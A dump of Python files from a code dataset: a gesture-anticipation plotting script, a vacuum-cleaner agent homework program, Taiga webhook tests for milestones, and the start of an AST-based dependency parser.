pickle.load(open(\"prediction_gesture_rt_8040.00.pkl\", 'rb'), encoding=\"bytes\")\n \n \n predictions = {\"classes\":[], \"labels\":[]}\n \n for i,value in enumerate(values):\n predictions[\"labels\"].append(value['label'])\n predictions[\"classes\"].append(value['pred'])\n \n # names = [\"Ask\",\"Come_Here\",\"Leave\",\"Follow\",\"Stop\",\"Abort\",\"Good\",\"No\",\"Bad\",\"Give_way\",\"Pointing\",\"Doubt\",\"Louder\",\"Quieter\",\"Be_quiet\"]\n names = [\"Pedido de ajuda\",\"Venha aqui\",\"Pode sair\",\"Siga-me\",\"Pare\",\"Abortar missão\",\"Bom\",\"Não\",\"Ruim\",\"Dar passagem\",\"Apontar\",\"Dúvida\",\"Mais alto\",\"Mais baixo\",\"Silêncio\"]\n generate_confusion_matrix(predictions,names)\n \n\n\ndef plot_probability_threshold():\n values= pickle.load(open(\"results/prediction_m_g_b.pkl\", 'rb'), encoding=\"bytes\")\n predictions = {\"classes\":[], \"labels\":[]}\n results = []\n for t in range(100):\n t /= 100.0\n corrects = []\n total_frames = []\n corrects_ant = 0\n anticipate = []\n anticipated = -1\n for i,value in enumerate(values):\n label = value[b'label']\n pred = value[b'pred']\n begin,end = value[b'interval']\n probs = value[b'probs']\n\n c = np.argmax(probs, axis= 1)\n p = np.amax(probs, axis= 1)\n \n m = p>t\n x = np.argmax(m)\n count = 0\n\n # if x>0:\n # for j in range(x, len(m)):\n # if m[j]:\n # count += 1\n # x = j\n # else:\n # count = 0\n # x = 0\n \n # if count == t:break\n \n a = c[x]\n if x >0 and a == label:\n corrects_ant += 1.0\n \n #predictions[\"labels\"].append(label)\n #predictions[\"classes\"].append(a)\n\n ant = float(x)/len(probs) if x > 0 else 1.0 #len(probs)\n anticipate.append(ant)\n total_frames.append(len(probs))\n\n corrects.append(pred==label)\n #plot_conf_matrix(predictions)\n #return\n acc = corrects_ant/len(corrects)\n m = sum(total_frames)/len(total_frames)\n ant = (sum(anticipate)/len(anticipate))\n \n results.append([t,acc,ant])\n \n results = np.array(results) \n #\n results[0,[1,2]] = results[1,[1,2]]\n \n acc = results[:,1].max()\n pos = results[:,1].argmax()\n u_acc = results[pos,0]\n acc_frame = results[pos,2]\n \n frame = results[:,2].min()\n pos = results[:,2].argmin()\n u_frame = results[pos,0]\n frame_acc = results[pos,1]\n\n print(acc, frame, u_acc, u_frame)\n fig, axis = plt.subplots(1,1,figsize=(12, 5))\n g,=axis.plot(results[:,0],results[:,1],color = \"g\")\n o, = axis.plot(results[:,0],results[:,2],color = \"orange\")\n k,= axis.plot([u_acc,u_acc],[0,acc],linestyle='--',color=\"k\", linewidth=2)\n axis.plot([0,u_acc],[acc,acc],linestyle='--',color=\"k\", linewidth=2)\n axis.plot([0,u_acc],[acc_frame,acc_frame],linestyle='--',color=\"k\", linewidth=2)\n \n axis.text(u_frame,frame_acc-0.05,\"{:.2f}%\".format(frame_acc*100))\n axis.text(u_acc,acc+0.01,\"{:.2f}%\".format(acc*100))\n\n b,=axis.plot([u_frame,u_frame],[0,frame],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([0,u_frame],[frame,frame],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([0,u_frame],[frame_acc,frame_acc],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([u_frame, u_frame],[frame_acc,frame],linestyle='-.',color=\"b\", linewidth=1)\n \n\n axis.text(u_acc+0.01, acc_frame+0.01,\"{}%\".format(int(acc_frame*100)))\n axis.text(u_frame+0.01,frame-0.04,\"{}%\".format(int(frame*100)))\n\n axis.set_ylabel(\"Anticipation Accuracy / Observation Ratio(OR)\")\n\n axis.set_xlabel(\"Probability\")\n axis.legend([g,o,k,b],[\"Anticipation Accuracy\", \"Average OR Anticipation\",\"Maximum Anticipation Accuracy\",\"Minimum Average OR Anticipation\"],loc=\"center left\", framealpha=1, frameon=True)\n axis.set_title(\"Anticipation vs Probability ($DLSTM_{mho}$)\", weight=\"bold\")\n \n # axis.set_xlabel(\"Aditional OR after the first prediction (z)\")\n # axis.legend([g,o,k],[\"Anticipation Accuracy (threshold = 0.9)\", \"Average OR Anticipation\",\"Maximum Anticipation Accuracy\"],loc=\"center right\", framealpha=1, frameon=True)\n #axis.set_title(\"Anticipation with threshold = 0.9\", weight=\"bold\")\n plt.show()\n\n\n\ndef plot_uncertainty():\n font_act = font_manager.FontProperties(weight='bold',\n style='normal', size=10)\n box = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n th=0.2\n values = pickle.load(open(\"prediction_gesture3_0_91.16.pkl\", 'rb')) #prediction_BBB_9833.pkl\n values.sort(key = lambda d:d['interval'][0])\n colors = [\"green\", \"black\", \"blue\", \"red\",\"brown\", \"indigo\",\"coral\",\"lime\",\"orange\",\"yellow\", \"navy\",\"salmon\",\"gray\",\"darkorange\",\"deepskyblue\"]\n for i,value in enumerate(values):\n lines = []\n label = value['label']\n pred = value['pred']\n b,e = value['interval'] \n fig, axs = plt.subplots(1, 2,figsize=(20, 5))\n begin,end = value['interval']\n probs = value['probs']\n vr,h,mi = calc_uncertainties(probs)\n meanst = probs.mean(1)\n std = probs.std(1)\n\n axs[0].set_xlabel(\"Frame\")\n axs[0].set_ylabel(\"Probability\")\n axs[1].set_xlabel(\"Frame\")\n axs[1].set_ylabel(\"Mutual Information\")\n\n y1 = np.clip(meanst-std,0.0,1.0)\n y2 = np.clip(meanst+std,0.0,1.0)\n p = np.amax(meanst, axis= 1)\n c = np.argmax(meanst, axis= 1)\n std = std[range(len(c)),c]\n xu = np.argmax(mi < th) #using uncertainty\n x = np.argmax(p>=0.9)\n #print(std[xu])\n\n y = p[x]\n yu = p[xu]\n #hc = h[x]\n mic = mi[x]\n #hu = h[xu]\n miu = mi[xu]\n a = c[xu]\n indexes = np.arange(len(meanst))\n\n #axs[1].plot(norm(vr))\n #axs[1].plot(h )\n line_mi, = axs[1].plot(mi,color=\"g\")\n line_h, = axs[1].plot(h,color=\"r\")\n line_vr, = axs[1].plot(vr,color=\"orange\")\n \n\n axs[0].set_xlim(0,len(probs)+10)\n line_k, line_b = None, None\n for v in range(15): \n line, = axs[0].plot(meanst[:,v], color=colors[v])\n axs[0].fill_between(indexes,y1[:,v], y2[:,v],alpha=0.3, facecolor=colors[v])\n if len(lines) < len(colors):lines.append(line)\n\n if xu > 0:\n axs[0].plot([xu,xu],[0,yu],linestyle='--',color=\"k\", linewidth=2)\n axs[0].plot([0,xu],[yu,yu],linestyle='--',color=\"k\", linewidth=2)\n\n line_k,=axs[1].plot([xu,xu],[0,miu],linestyle='--',color=\"k\", linewidth=2)\n axs[1].plot([0,xu],[miu,miu],linestyle='--',color=\"k\", linewidth=2)\n \n tx,ty = [2,yu-0.07] if xu>70 else [xu+3,yu-0.07]\n axs[0].text(tx,ty , \" Act. {} at Frame {}\".format(a+1,xu),fontproperties = font_act, bbox = box)\n if a == label:\n axs[0].text(tx,ty , \"V\",bbox = box, fontproperties = font_act,color = \"g\")\n else:\n axs[0].text(tx,ty , \"X\",bbox = box, fontproperties = font_act,color = \"r\")\n #plt.savefig('charts_uncertainty/chart_act{}_{}.png'.format(str(label+1),i))\n else:\n axs[0].text(10, 0.5 , \"It was not possible to anticipate\", bbox = box,fontproperties = font_act,color = \"r\")\n line_k,=axs[1].plot([0,len(mi)],[0.1,0.1],linestyle='--',color=\"k\", linewidth=2)\n\n if x>0:\n axs[0].plot([x,x,],[0,y],linestyle='-.',color=\"b\", linewidth=2)\n axs[0].plot([0,x,],[y,y],linestyle='-.',color=\"b\", linewidth=2)\n\n axs[1].plot([x,x,],[0,mic],linestyle='-.',color=\"b\", linewidth=2)\n line_b, =axs[1].plot([0,x,],[mic,mic],linestyle='-.',color=\"b\", linewidth=2)\n \n \n axs[0].set_title(\"label ({}) / Prediction ({})\".format(label+1,pred+1), weight=\"bold\")\n axs[0].legend(lines+[line_k,line_b],[\"{}\".format(i) for i in range(1,len(colors)+1)]+[\"MI < {}\".format(th),\"prob >= 0.9\"],loc=\"center right\")\n axs[1].legend([line_mi,line_h,line_vr,line_k,line_b],[\"MI\",\"MI < {}\".format(th),\"prob >= 0.9\"])\n axs[1].set_title(\"Uncertainty - (MI - Mutual Information)\", weight=\"bold\")\n #plt.show()\n #return \n #if xu<=0 or a != label:\n\n plt.savefig('charts/chart_act_({}-{})_{}_{}.png'.format(begin,end,label+1,i))\n plt.close()\n\n\n\ndef show_many(frames, m,g,b,mg,mgb, out):\n #labels_body = np.load(\"labels_body.npy\").astype(int)\n\n probs = np.array([m[b'probs'], g[b'probs'], b[b'probs'],mg[b'probs'] , mgb[b'probs']])\n #pred = np.array([m[b'pred'], mg[b'pred'] , mgb[b'pred']])\n # label = np.array([m[b'label'], mg[b'label'] , mgb[b'label']])\n begin,end = m[b'interval']\n \n \n\n\n fig, axs = plt.subplots(2, 3)\n axs = axs.reshape((-1,))\n fig.subplots_adjust(hspace=0.5)\n titles = [\"Movement\", \"Gaze\",\"Ball\",\"Movement + Gaze \", \"Movement + Gaze + Ball\",\"\"]\n for a,t in zip(axs,titles):\n if t ==\"\":\n a.grid(False)\n a.set_yticklabels([])\n a.set_xticklabels([])\n else:\n a.set_xlim(0,len(probs[0]))\n a.set_ylim(0.0,1.0)\n a.set_xlabel(\"Frame\")\n a.set_title(t)\n a.set_ylabel(\"Accuracy\")\n a.tick_params(labelsize=6)\n \n # fig = plt.figure(facecolor=(0.6843, 0.9098, 0.9098))\n # plt.xlim([0,len(prob_m)])\n # plt.ylim([0.0,1.0])\n # plt.xlabel(\"Frame\")\n # plt.ylabel(\"Accuracy\")\n\n draw_hand = True\n draw_body = True\n draw_ball = True\n draw_head = True\n empty = False\n empty_image = (np.ones((480,640,3))*127).astype(np.uint8) \n #framesw = pims.Video(\"./dataset/world.mp4\")\n labels = np.load(\"labels_complete_cut.npy\").astype(int) \n #cv2.imshow(\"Action Dataset\",empty_image)\n labels = labels[begin:end]\n colors = [\"green\", \"black\", \"blue\", \"red\",\"brown\", \"indigo\",\"coral\",\"lime\",\"orange\",\"yellow\", \"navy\",\"salmon\"]\n for i, label in enumerate(labels):\n\n # convert canvas to image\n\n frame = frames[label[0]]\n ball = label[2:4]\n body = label[4:40].reshape((18,2)).astype(int)\n hand = label[40:44].reshape((2,2)).astype(int)\n\n\n frame = empty_image if empty else frame\n frame = draw_head(frame,body) if draw_head else frame\n frame = draw_bodypose(frame,body) if draw_body else frame\n frame = draw_hand_center(frame,hand) if draw_hand else frame\n frame = draw_ballpose(frame,ball.astype(int)) if draw_ball else frame\n frame = draw_class(frame, label[1])\n #frame = cv2.resize(frame, (320, 240))\n\n\n for a,p in zip(axs[:-1],probs):\n for j in range(12):\n a.plot(p[:i,j], color = colors[j])\n a.legend([i for i in range(1,13)], loc='upper right',fontsize = 6)\n axs[-1].imshow(frame)\n fig.canvas.draw()\n\n img = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8,sep='')\n img = img.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n #img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n img_plot = cv2.resize(img, (1280, 720))\n img_plot = img_plot[:,:,[2,1,0]]\n out.write(img_plot)\n continue\n\n #image = np.concatenate((img_plot,frame),axis=1)\n cv2.imshow(\"Action Dataset\",img_plot[:,:,[2,1,0]])\n k = cv2.waitKey(10)\n print(k)\n if k == 27:break\n if k == 98:draw_ball = not draw_ball #B\n if k == 101:empty = not empty #E\n if k == 104:draw_hand = not draw_hand #H\n if k == 106:draw_body = not draw_body #J\n if k == 32: \n while cv2.waitKey(30) != 32:continue\n plt.close()\n\ndef plot_acc_classes():\n th_acc = [0.8,0.9]\n th_ent = [0.6,0.38]\n #titles_acc = [\"Movement\", \"Head\", \"Object\", \"Movement + Head\", \"Movement + Object\", \"Movement + Head + Object\",\"Threshold at {}\".format(th_acc[0]), \"Threshold at {}\".format(th_acc[1])]\n titles_acc = [\"$DLSTM_{6m}$ (Movement)\", \"$DLSTM_{6h}$ (Head)\", \"$DLSTM_{6o}$ (Object)\", \"$DLSTM_{6mh}$ (Movement + Head)\", \"$DLSTM_{6mo}$ (Movement + Object)\", \"$DLSTM_{6mho}$ (Movement + Head + Object)\", \"{}% of accuracy\".format(int(th_acc[0]*100)), \"{}% of accuracy\".format(int(th_acc[1]*100))]\n titles_ent = [\"Movement\", \"Head\", \"Object\", \"Movement + Head\", \"Movement + Object\", \"Movement + Head + Object\",\"Threshold at {}\".format(th_ent[0]), \"Threshold at {}\".format(th_ent[1])]\n #titles_ent = [\"Movement\", \"Head\", \"Movement + Head\", \"Threshold at {}\".format(th_ent[0]), \"Threshold at {}\".format(th_ent[1])]\n\n #plt.rc('text', usetex=True)\n #plt.rc('font', family='serif')\n actions = [0,1,2,3,4,5]\n actions = [6,7,8,9,10,11]\n actions = [0,1,2,3,4,5,6,7,8,9,10,11]\n acc_classes = np.zeros((100,len(titles_acc)-2))\n entropies = np.zeros((100,len(titles_acc)-2))\n fig, axs = plt.subplots(1, 1, figsize=(12, 12))\n fig.subplots_adjust(hspace=1.0)\n #axs = axs.reshape((-1,))\n for s, source in enumerate( [\"mov\",\"gaze\",\"ball\",\"mov_gaze\", \"mov_ball\", \"complete\"]):\n #values = pickle.load(open(\"results/prediction_m_g_b.pkl\", 'rb'), encoding=\"bytes\")\n #values = pickle.load(open(\"./results/prediction_6_g.pkl\", 'rb'), encoding=\"bytes\")\n # if len(sys.argv) >1:\n # source = sys.argv[1]\n values = pickle.load(open(\"./results/prediction_m_g_b.pkl\", 'rb'),encoding=\"bytes\")\n \n if source ==\"gaze\":\n values = pickle.load(open(\"./results/prediction{}_g.pkl\".format(\"_6\" if len(actions) == 7 else \"\"), 'rb'), encoding=\"bytes\")\n\n elif source ==\"mov\":\n values = pickle.load(open(\"./results/prediction{}_m.pkl\".format(\"_6\" if len(actions) == 7 else \"\"), 'rb'), encoding=\"bytes\")\n\n elif source ==\"ball\":\n values = pickle.load(open(\"./results/prediction_b.pkl\", 'rb'), encoding=\"bytes\")\n\n elif source ==\"mov_gaze\":\n values = pickle.load(open(\"./results/prediction{}_m_g.pkl\".format(\"_6\" if len(actions) == 7 else \"\"), 'rb'), encoding=\"bytes\")\n\n elif source ==\"mov_ball\":\n values = pickle.load(open(\"./results/prediction_m_b.pkl\", 'rb'), encoding=\"bytes\")\n \n values = [v for v in values if v[b'label'] in actions]\n corrects_ant = 0.0\n corrects = []\n anticipate = []\n total_frames = []\n for v in values:\n begin,end = v[b'interval']\n probs = v[b'probs']\n label = v[b'label'].numpy()\n pred = v[b'pred'].numpy()\n \n if len(probs.shape)>2:\n vr,h,mi = calc_uncertainties(probs)\n std = probs.std(1)\n probs = probs.mean(1)\n std = std[range(len(c)),c]\n p = np.amax(probs, axis= 1)\n c = np.argmax(probs, axis= 1)\n \n x = np.argmax(p >=0.9)\n #print(\"{:.1f}/{}- {:.4f} - {:.4f} - {:.4f}\".format(vr[x],label,h[x],mi[x],std[x]))\n y = p[x]\n a = c[x]\n if a == label:\n corrects_ant += 1.0\n\n ant = x if x > 0 else len(probs)\n ant = ant\n anticipate.append(ant/float(len(probs)))\n total_frames.append(len(probs))\n a = a*c\n corrects.append(pred==label)\n\n\n corr = c == label #) * (p>0.9)\n corr_ent = -1*np.sum(probs*np.log(probs),1)\n ratio = len(corr) / 100.0\n for i in range(100):\n p = corr[int(i*ratio)]\n acc_classes[i,s] += float(p)\n\n p = corr_ent[i] if i < len(corr_ent) else corr_ent[-1]\n entropies[i,s] += float(p)\n \n m = sum(total_frames)/len(total_frames)\n\n \n print(\" {}: {:.2f} - ({:.2f}/{:.2f}% acc)\".format(source, (sum(anticipate)/len(anticipate))*m, corrects_ant/len(corrects)*100, sum(corrects)/float(len(corrects))*100) )\n #entropies /= len(actions)*20 \n acc_classes /= len(actions)*20\n observation_ration = np.array([ i / 100.0 for i in range(100)])\n \n axs.plot(observation_ration, acc_classes,)\n axs.axhline(y=th_acc[0], color='B', linestyle='-.')\n axs.axhline(y=th_acc[1], color='k', linestyle='--')\n axs.legend(titles_acc, loc='lower right')\n axs.set_title(\"Extended dataset - 12 Actions\")\n axs.set_xlabel(\"Observation Ratio\")\n axs.set_ylabel(\"Accuracy\")\n \n # d = loadmat(\"./results/paul.fig\",squeeze_me=True, struct_as_record=False)\n # matfig = d['hgS_070000']\n # childs = matfig.children\n # ax1 = [c for c in childs if c.type == 'axes']\n # if(len(ax1) > 0):\n # ax1 = ax1[0]\n # legs = [c for c in childs if c.type == 'scribe.legend']\n # if(len(legs) > 0):\n # legs = legs[0]\n # else:\n # legs=0\n \n \n # # titles_acc = [\"3D Pose (Movement)\", \"3D Pose + Gaze\", \"{}% of accuracy\".format(int(th_acc[0]*100)), \"{}% of accuracy\".format(int(th_acc[1]*100))]\n # for line in ax1.children:\n # if line.type == 'graph2d.lineseries':\n # #x = line.properties.XData\n \n # y = line.properties.YData\n # total = len(y)\n # x = np.array([ i / float(total) for i in range(total)])\n # axs[1].plot(x,y)\n # axs[1].axhline(y=th_acc[0], color='B', linestyle='-.')\n # axs[1].axhline(y=th_acc[1], color='k', linestyle='--')\n # axs[1].legend(titles_acc, loc='lower right')\n # axs[1].set_title(\"Schydlo et al., 2018\")\n # axs[1].set_xlabel(\"Observation Ratio\")\n # axs[1].set_ylabel(\"Accuracy\")\n\n #fig.suptitle(\"Complete Dataset - All Information\", fontsize=15, weight=\"bold\")\n\n #plt.title(\"Actions {}\".format(\",\".join([str(i +1) for i in actions])))\n #plt.title(\"All Actions\")\n plt.show()\n\n\ndef entropy(probs):\n return -(probs*np.log(probs)).sum()\n\ndef calc_uncertainties(probs):\n #vr= np.argmax(probs, axis= 2).mean(1) #variation ratio\n if len(probs.shape) > 2:\n mean = probs.mean(1)\n h = -(mean*np.log(mean)).sum(1) #entropy\n mi = -(probs*np.log(probs)).sum(2).mean(1)#mutual information\n else: \n mean = probs.mean(0)\n h = -(mean*np.log(mean)).sum(0) #entropy\n mi = -(probs*np.log(probs)).sum(1).mean(0)#mutual information\n \n return h,mi,h+mi\n\n\n\nif __name__ == \"__main__\": \n # show_video()\n # generate_video()\n # plot_probability_threshold()\n plot_conf_matrix()\n # plot_uncertainty_threshold()\n #plot_uncertainty()\n #plot_all_charts()\n #plot_acc_classes()\n # plot_uncertainty()\n\n \n\n\n\n\n","sub_path":"RTgesture/plot_predictions.py","file_name":"plot_predictions.py","file_ext":"py","file_size_in_byte":42234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"376121199","text":"import agents as ag\nimport random\n\ndef HW2Agent() -> object:\n\n def updatemap(Lastaction,currentPos,Bump):\n newPos = (0,0)\n if Lastaction == 'Left' and Bump == 'Bump':\n #program.map.append[currentPos][0]= 1\n program.bounds[0] = currentPos[0]\n print(str(program.bounds) + 'Left Bump')\n program.hasBumped[0] = True\n #program.bumpCount = program.bumpCount + 1\n #program.currentPos= (currentPos[0]-1, currentPos[1])\n print(program.currentPos)\n elif Lastaction == 'Up' and Bump == 'Bump':\n # program.map[currentPos][1] = 1\n program.bounds[1]=currentPos[1]\n program.hasBumped[1] = True\n program.bumpCount = program.bumpCount + 1\n print(str(program.bounds) + 'Up Bump')\n #program.currentPos = (currentPos[0], currentPos[1]+1)\n print(program.currentPos)\n elif Lastaction == 'Right' and Bump == 'Bump':\n # program.map[currentPos][2] = 1\n program.bumpCount = program.bumpCount + 1\n program.bounds[2]=currentPos[0]\n program.hasBumped[2] = True\n print(str(program.bounds) + 'Right Bump')\n #program.currentPos=(currentPos[0]+1,currentPos[1])\n print(program.currentPos)\n elif Lastaction == 'Down' and Bump == 'Bump':\n # program.map[currentPos][3] = 1\n program.bumpCount = program.bumpCount + 1\n program.bounds[3] = currentPos[1]\n program.hasBumped[0] = True\n print(str(program.bounds) + 'Down Bump')\n #program.currentPos = (currentPos[0], currentPos[1]-1)\n #print('CurrentPos:' + str(program.currentPos))\n\n\n\n elif Lastaction == 'Left' and Bump != 'Bump':\n program.currentPos = (currentPos[0] - 1, currentPos[1])\n elif Lastaction == 'Up' and Bump != 'Bump':\n # program.map[currentPos][1] = 0\n # program.bounds[1]=currentPos[1\n program.currentPos = (currentPos[0], currentPos[1]+1)\n elif Lastaction == 'Right' and Bump != 'Bump':\n #program.map[currentPos][2] = 0\n # program.bounds[2]=currentPos[2]\n program.currentPos = (currentPos[0] + 1, currentPos[1])\n elif Lastaction == 'Down' and Bump != 'Bump':\n #program.map[currentPos][3] = 0\n #program.bounds[3] = currentPos[3]\n program.currentPos = (currentPos[0], currentPos[1] - 1)\n\n print('CurrentPos out:' + str(program.currentPos))\n print('BumpCount: '+ str(program.bumpCount))\n\n\n\n #def evalMove():\n\n\n\n\n\n\n\n\n\n def program(percept):\n bump, status = percept\n lastAction = program.oldActions[-1]\n \"\"\"\"\"\n if bump == 'Bump':\n program.bumpCount = program.bumpCount + 1\n if program.currentPos[0] == program.bounds[0] or program.currentPos[0] == program.bounds[2] or program.currentPos[1] == program.bounds[1] or program.currentPos[1]== program.bounds[3]:\n program.bumpCount = program.bumpCount + 1\n if program.bumpCount == 4:\n program.hasBounds = True\n program.bounds[0]= program.bounds[0] + 1\n program.bounds[1] = program.bounds[1]-1\n program.bounds[2] =program.bounds[2]-1\n program.bounds[3] =program.bounds[3]+1\n program.bumpCount =0\n \"\"\"\n\n #if program.bounds[0] != -100 and program.bounds[1]!= 100 and program.bounds[2] != 100 and program.bounds[3] != -100:\n # program.hasBounds = True\n \"\"\"\n if program.currentPos[0] == program.bounds[0] and program.hasBounds == True or program.currentPos[0] == program.bounds[2] and program.hasBounds == True or program.currentPos[1]== program.bounds[1] and program.hasBounds == True or program.currentPos[1] == program.bounds[3] and program.hasBounds == True:\n program.bumpCount= program.bumpCount +1\n print('Bound Bump')\n if program.bumpCount % 4 == 0:\n program.bounds[0] = program.bounds[0] + 1\n program.bounds[1] = program.bounds[1] - 1\n program.bounds[2] = program.bounds[2] - 1\n program.bounds[3] = program.bounds[3] + 1\n \"\"\"\n if status == 'Dirty':\n action = 'Suck'\n else:\n lastBump, lastStatus, = program.oldPercepts[-1]\n\n if bump == 'None' and program.currentPos[0] <= program.bounds[2]:\n action = 'Right'\n if bump == 'Bump' and program.currentPos[1] <= program.bounds[1] or lastAction == 'Up' and program.currentPos[1] <= program.bounds[1]:\n action = 'Up'\n if bump == 'Bump' and lastAction == 'Up' and program.currentPos[0]>= program.bounds[0] or lastAction == 'Left' and program.currentPos[0]>= program.bounds[0]:\n action = 'Left'\n if bump =='Bump' and lastAction== 'Left' and program.currentPos[1]>= program.bounds[3] or lastAction == 'Down' and program.currentPos[1]>= program.bounds[3]:\n action = 'Down'\n if bump =='Bump' and lastAction =='Down':\n action = 'Right'\n\n \"\"\"\"\n if bump == 'None' and program.currentPos[0] <= program.bounds[2] and program.hasBounds==True:\n action = 'Right'\n if program.currentPos[1] <= program.bounds[1] or lastAction == 'Up' and program.currentPos[1] <= program.bounds[1] and program.hasBounds==True:\n action = 'Up'\n if lastAction == 'Up' and program.currentPos[0]>= program.bounds[0] or lastAction == 'Left' and program.currentPos[0]>= program.bounds[0] and program.hasBounds==True:\n action = 'Left'\n if lastAction== 'Left' and program.currentPos[1]>= program.bounds[3] or lastAction == 'Down' and program.currentPos[1]>= program.bounds[3] and program.hasBounds==True:\n action = 'Down'\n if lastAction =='Down' and program.hasBounds==True:\n action = 'Right'\n \"\"\"\n\n \"\"\"\"\"\n if program.hasBounds == True and lastAction=='Right' and program.currentPos[0]==program.bounds[1]:\n action == 'Up'\n if program.hasBounds == True and lastAction=='Up' and program.currentPos[1]< program.bounds[2] or program.hasBounds==True and lastAction == 'Left' and program.currentPos[0] >= program.bounds[0]:\n action == 'Left'\n if program.hasBounds == True and lastAction=='Left' or program.hasBounds==True and lastAction == 'Down' and program.currentPos >= program.bounds[3]:\n action == 'Down'\n \"\"\"\n\n\n\n\n\n\n\n\n #updatemap(lastAction, program.currentPos, program.oldPercepts[-1][0])\n program.oldPercepts.append(percept)\n program.oldActions.append(action)\n print('Bump in:' + bump)\n print('CurrentPos in:' + str(program.currentPos))\n print('Last Action:' + lastAction)\n updatemap(lastAction, program.currentPos, bump)\n\n #print(program.bounds)\n\n return action\n\n # assign static variables here\n program.oldPercepts = [('None', 'Clean')]\n program.oldActions = ['NoOp']\n program.bumpCount = 0\n program.hasBumped=[False,False,False,False]\n program.hasBounds= False\n program.currentPos=(0,0)\n program.bounds = [-100,100,100,-100]\n print(program.bounds)\n\n agt = ag.Agent(program)\n # assign class attributes here:\n # agt.direction = ag.Direction('left')\n\n return agt\n\n","sub_path":"submissions/Colburn/vacuum2.py","file_name":"vacuum2.py","file_ext":"py","file_size_in_byte":7506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"288860993","text":"# -*- coding: utf-8 -*-\n# Copyright (C) 2014-2017 Andrey Antukh \n# Copyright (C) 2014-2017 Jesús Espino \n# Copyright (C) 2014-2017 David Barragán \n# Copyright (C) 2014-2017 Alejandro Alonso \n# Copyright (C) 2014-2017 Anler Hernández \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\nimport pytest\nfrom unittest.mock import patch\nfrom unittest.mock import Mock\n\nfrom .. import factories as f\n\nfrom taiga.projects.history import services\n\n\npytestmark = pytest.mark.django_db(transaction=True)\n\n\nfrom taiga.base.utils import json\n\ndef test_webhooks_when_create_milestone(settings):\n settings.WEBHOOKS_ENABLED = True\n project = f.ProjectFactory()\n f.WebhookFactory.create(project=project)\n f.WebhookFactory.create(project=project)\n\n obj = f.MilestoneFactory.create(project=project)\n\n with patch('taiga.webhooks.tasks._send_request') as send_request_mock:\n services.take_snapshot(obj, user=obj.owner)\n assert send_request_mock.call_count == 2\n\n (webhook_id, url, key, data) = send_request_mock.call_args[0]\n assert data[\"action\"] == \"create\"\n assert data[\"type\"] == \"milestone\"\n assert data[\"by\"][\"id\"] == obj.owner.id\n assert \"date\" in data\n assert data[\"data\"][\"id\"] == obj.id\n\n\ndef test_webhooks_when_update_milestone(settings):\n settings.WEBHOOKS_ENABLED = True\n project = f.ProjectFactory()\n f.WebhookFactory.create(project=project)\n f.WebhookFactory.create(project=project)\n\n obj = f.MilestoneFactory.create(project=project)\n\n with patch('taiga.webhooks.tasks._send_request') as send_request_mock:\n services.take_snapshot(obj, user=obj.owner)\n assert send_request_mock.call_count == 2\n\n obj.name = \"test webhook update\"\n obj.save()\n\n with patch('taiga.webhooks.tasks._send_request') as send_request_mock:\n services.take_snapshot(obj, user=obj.owner, comment=\"test_comment\")\n assert send_request_mock.call_count == 2\n\n (webhook_id, url, key, data) = send_request_mock.call_args[0]\n assert data[\"action\"] == \"change\"\n assert data[\"type\"] == \"milestone\"\n assert data[\"by\"][\"id\"] == obj.owner.id\n assert \"date\" in data\n assert data[\"data\"][\"id\"] == obj.id\n assert data[\"data\"][\"name\"] == obj.name\n assert data[\"change\"][\"comment\"] == \"test_comment\"\n assert data[\"change\"][\"diff\"][\"name\"][\"to\"] == data[\"data\"][\"name\"]\n assert data[\"change\"][\"diff\"][\"name\"][\"from\"] != data[\"data\"][\"name\"]\n\n\ndef test_webhooks_when_delete_milestone(settings):\n settings.WEBHOOKS_ENABLED = True\n project = f.ProjectFactory()\n f.WebhookFactory.create(project=project)\n f.WebhookFactory.create(project=project)\n\n obj = f.MilestoneFactory.create(project=project)\n\n with patch('taiga.webhooks.tasks._send_request') as send_request_mock:\n services.take_snapshot(obj, user=obj.owner, delete=True)\n assert send_request_mock.call_count == 2\n\n (webhook_id, url, key, data) = send_request_mock.call_args[0]\n assert data[\"action\"] == \"delete\"\n assert data[\"type\"] == \"milestone\"\n assert data[\"by\"][\"id\"] == obj.owner.id\n assert \"date\" in data\n assert \"data\" in data\n","sub_path":"tests/integration/test_webhooks_milestones.py","file_name":"test_webhooks_milestones.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"25533967","text":"import ast\nimport inspect\nimport textwrap\nfrom typing import Callable, cast, Dict, Set\n\n\nclass DependencyParser(ast.NodeVisitor):\n secondary_attributes: Dict[str, Set[str]]\n\n def __init__(self, func: Callable):\n if type(func) == type:\n func = cast(object, func).__init__\n spec: inspect.Signature = inspect.signature(func)\n params = spec.parameters\n assert len(params) == 2\n param: inspect.Parameter = params[list(params.keys())[1]]\n source = textwrap.dedent(inspect.getsource(func))\n\n else:\n spec: inspect.Signature = inspect.signature(func)\n params = spec.parameters\n assert len(params) >= 1\n param: inspect.Parameter = params[list(params.keys())[0]]\n source = inspect.getsource(func)\n\n assert (param.kind == param.POSITIONAL_ONLY or\n param.kind == param.POSITIONAL_OR_KEYWORD)\n\n self.arg_name = param.name\n\n self.required = set()\n self.secondary_attributes = {}\n self.is_referenced = False\n\n source = textwrap.dedent(source)\n parsed = ast.parse(source)\n self.visit(parsed)\n\n def visit_Attribute(self, node: ast.Attribute):\n if isinstance(node.value, ast.Name) and node.value.id == self.arg_name:\n self.required.add(node.attr)\n elif (isinstance(node.value, ast.Attribute) and\n isinstance(node.value.value, ast.Name) and\n node.value.value.id == self.arg_name):\n self.required.add(node.value.attr)\n if node.value.attr not in self.secondary_attributes:\n self.secondary_attributes[node.value.attr] = set()\n 